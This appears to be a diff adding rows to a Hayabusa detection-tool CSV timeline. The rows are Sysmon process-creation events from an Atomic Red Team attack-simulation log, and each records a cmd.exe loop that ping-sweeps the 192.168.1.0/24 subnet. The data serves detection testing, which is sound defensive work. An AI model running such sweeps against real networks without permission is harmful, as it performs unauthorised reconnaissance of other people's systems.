+2019-07-19 23:52:13.489 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.78 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4092 | PGUID: 747F3D96-D91D-5D31-0000-0010B7FF3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:14.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.79 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6516 | PGUID: 747F3D96-D91E-5D31-0000-0010A1023500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:14.552 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.80 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1232 | PGUID: 747F3D96-D91E-5D31-0000-00108E053500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:15.051 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.81 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3164 | PGUID: 747F3D96-D91F-5D31-0000-001079083500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:15.548 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.82 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5612 | PGUID: 747F3D96-D91F-5D31-0000-0010640B3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:16.040 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.83 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2288 | PGUID: 747F3D96-D920-5D31-0000-00104E0E3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:16.584 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.84 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1684 | PGUID: 747F3D96-D920-5D31-0000-0010A6183500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:17.041 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.85 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1060 | PGUID: 747F3D96-D921-5D31-0000-0010921B3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:17.511 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.86 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3744 | PGUID: 747F3D96-D921-5D31-0000-00107C1E3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:18.015 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.87 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3068 | PGUID: 747F3D96-D922-5D31-0000-001066213500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:18.509 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.88 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6312 | PGUID: 747F3D96-D922-5D31-0000-001063243500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:18.990 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.89 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3116 | PGUID: 747F3D96-D922-5D31-0000-001053273500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:19.541 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.90 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3868 | PGUID: 747F3D96-D923-5D31-0000-00103D2A3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:20.006 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.91 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1020 | PGUID: 747F3D96-D924-5D31-0000-0010272D3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:20.543 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.92 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2292 | PGUID: 747F3D96-D924-5D31-0000-001024303500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:21.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.93 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D925-5D31-0000-00106C3C3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:21.488 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.94 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5852 | PGUID: 747F3D96-D925-5D31-0000-0010563F3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:22.030 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.95 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6288 | PGUID: 747F3D96-D926-5D31-0000-00101B483500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:22.542 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.96 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D926-5D31-0000-0010074B3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:23.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.97 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 747F3D96-D927-5D31-0000-0010F24D3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:23.534 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.98 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D927-5D31-0000-0010DC503500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:24.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.99 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-D928-5D31-0000-0010C7533500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:24.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.100 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D928-5D31-0000-0010B1563500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:25.035 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.101 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7152 | PGUID: 747F3D96-D929-5D31-0000-00109D593500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:25.529 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.102 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4316 | PGUID: 747F3D96-D929-5D31-0000-00108A5C3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:26.007 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.103 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6084 | PGUID: 747F3D96-D929-5D31-0000-0010765F3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:26.534 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.104 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3700 | PGUID: 747F3D96-D92A-5D31-0000-001062623500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:27.040 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.105 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2852 | PGUID: 747F3D96-D92B-5D31-0000-0010296B3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:27.493 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.106 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6484 | PGUID: 747F3D96-D92B-5D31-0000-00108D6E3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:28.017 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.107 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5400 | PGUID: 747F3D96-D92C-5D31-0000-00107A713500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:28.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.108 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3452 | PGUID: 747F3D96-D92C-5D31-0000-001072743500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:29.110 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.109 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4468 | PGUID: 747F3D96-D92D-5D31-0000-001068773500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:29.561 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.110 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4320 | PGUID: 747F3D96-D92D-5D31-0000-0010787A3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:30.054 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.111 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3952 | PGUID: 747F3D96-D92E-5D31-0000-0010787D3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:30.526 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.112 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6148 | PGUID: 747F3D96-D92E-5D31-0000-001091803500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:31.015 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.113 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3800 | PGUID: 747F3D96-D92F-5D31-0000-00109C833500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:31.476 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.114 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1324 | PGUID: 747F3D96-D92F-5D31-0000-0010478A3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:32.005 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.115 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3268 | PGUID: 747F3D96-D92F-5D31-0000-00109A973500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:32.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.116 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1860 | PGUID: 747F3D96-D930-5D31-0000-0010879A3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:33.004 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.117 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4996 | PGUID: 747F3D96-D931-5D31-0000-00108F9D3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:33.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.118 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2460 | PGUID: 747F3D96-D931-5D31-0000-0010A9A03500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:33.900 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.119 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6156 | PGUID: 747F3D96-D931-5D31-0000-00105CA63500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:34.490 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.120 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-D932-5D31-0000-001057A93500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:35.031 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.121 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5832 | PGUID: 747F3D96-D933-5D31-0000-001062AC3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:35.411 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.122 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3684 | PGUID: 747F3D96-D933-5D31-0000-001098AF3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
